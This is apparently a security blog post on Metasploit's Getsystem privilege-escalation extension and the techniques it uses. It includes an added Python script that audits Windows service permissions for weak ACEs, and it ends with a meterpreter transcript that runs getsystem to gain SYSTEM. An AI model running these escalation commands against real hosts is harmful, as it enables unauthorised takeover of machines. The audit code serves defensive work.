A few weeks ago Chris Gates (aka Attack Research/Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit's Getsystem extension. Getsystem is meterpreter's new (Windows) privilege escalation extension, used in the priv module.
Getsystem uses several techniques for privilege escalation:
- Windows Impersonation Tokens (fixed by MS09-012)
- Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway.
- Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator).
- Improved KiTrap0D exploit released by Tavis Ormandy (patched as of now by MS10-015)
As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension, which I will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.
Below is a sample of the KiTrap0D exploit in MSF by Pieter Danhieux (not Getsystem, but the same functionality):
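The third technique in the list above works only when a service's DACL lets a low-privilege principal reconfigure it. The usual way to check for that on a host is to dump each service's security descriptor with `sc sdshow <service>` and read the SDDL string. The script below is an added example (not part of the original post, and not Metasploit code): it parses SDDL strings of the form `sc sdshow` prints and flags any access-allowed ACE that grants SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic write/all right to Everyone, Authenticated Users, Users, Interactive or similar well-known low-privilege groups. The three SDDL strings are constructed samples; the service names are placeholders.

```python
"""Audit Windows service DACLs (SDDL form) for rights that let a
low-privilege principal reconfigure or take control of the service."""
import re
from dataclasses import dataclass

# SDDL two-letter right codes as they apply to service objects, with the
# access-mask bit each one stands for (used when sc prints a hex mask).
RIGHT_BITS = {
    "CC": 0x00001,      # SERVICE_QUERY_CONFIG
    "DC": 0x00002,      # SERVICE_CHANGE_CONFIG (change binary path / account)
    "LC": 0x00004,      # SERVICE_QUERY_STATUS
    "SW": 0x00008,      # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x00010,      # SERVICE_START
    "WP": 0x00020,      # SERVICE_STOP
    "DT": 0x00040,      # SERVICE_PAUSE_CONTINUE
    "LO": 0x00080,      # SERVICE_INTERROGATE
    "CR": 0x00100,      # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x10000,      # DELETE
    "RC": 0x20000,      # READ_CONTROL
    "WD": 0x40000,      # WRITE_DAC
    "WO": 0x80000,      # WRITE_OWNER
    "GA": 0x10000000,   # GENERIC_ALL
    "GW": 0x40000000,   # GENERIC_WRITE
    "GR": 0x80000000,   # GENERIC_READ
}

# Rights that let the holder change what the service runs, or grant
# themselves that ability. Start/stop alone are not flagged.
DANGEROUS = {"DC", "WD", "WO", "GA", "GW"}

# Well-known SDDL trustee aliases (and raw SIDs) for low-privilege groups.
LOW_PRIV = {
    "WD": "Everyone", "AU": "Authenticated Users", "BU": "Builtin Users",
    "IU": "Interactive Users", "AN": "Anonymous", "BG": "Builtin Guests",
    "DU": "Domain Users", "NU": "Network Users",
    "S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
    "S-1-5-32-545": "Builtin Users", "S-1-5-4": "Interactive Users",
}

ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass(frozen=True)
class Finding:
    service: str
    trustee: str
    rights: tuple


def parse_dacl(sddl):
    """Return the ACE bodies from the D: (DACL) part only; the S: (SACL)
    part holds audit entries, not permissions, and is skipped."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    return ACE_RE.findall(m.group(1)) if m else []


def split_rights(field):
    """Turn the rights field into a set of two-letter codes, whether sc
    printed it as concatenated codes or as a hex access mask."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {code for code, bit in RIGHT_BITS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def audit(service, sddl):
    """Flag access-allowed ACEs granting DANGEROUS rights to LOW_PRIV trustees."""
    findings = []
    for ace in parse_dacl(sddl):
        # ACE fields: type;flags;rights;object_guid;inherit_guid;trustee
        parts = (ace.split(";") + [""] * 6)[:6]
        ace_type, rights, trustee = parts[0], parts[2], parts[5]
        if ace_type != "A" or trustee not in LOW_PRIV:
            continue
        bad = tuple(sorted(split_rights(rights) & DANGEROUS))
        if bad:
            findings.append(Finding(service, LOW_PRIV[trustee], bad))
    return findings


def audit_all(sddl_by_service):
    """Audit a {service_name: sddl} mapping, e.g. built from `sc sdshow` output."""
    return [f for name, sddl in sddl_by_service.items() for f in audit(name, sddl)]


# Constructed sample descriptors (placeholder service names).
SAMPLE_SDDL = {
    # Typical default: only SYSTEM and Administrators may reconfigure.
    "goodsvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    # Weak: Authenticated Users were given SERVICE_CHANGE_CONFIG (DC).
    "weaksvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)",
    # Weak, hex form: Everyone holds SERVICE_CHANGE_CONFIG and WRITE_DAC.
    "hexsvc": "D:(A;;0x4002f;;;WD)",
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_SDDL):
        print(f"{f.service}: {f.trustee} has {', '.join(f.rights)}")
```

Denied ACEs are ignored here, so a deny entry that masks an allow would still be reported; treat output as a list of descriptors to read, not a verdict. The fix for a flagged service is to remove the offending ACE (for example with `sc sdset` using a corrected descriptor) and to check the service binary's file and directory permissions as well, since a writable binary gives the same result as a writable configuration.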
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
    -h   Help Banner.
    -t   The technique to use. (Default to '0').
         0 : All techniques available
         1 : Service - Named Pipe Impersonation (In Memory/Admin)
         2 : Service - Named Pipe Impersonation (Dropper/Admin)
         3 : Service - Token Duplication (In Memory/Admin)
         4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM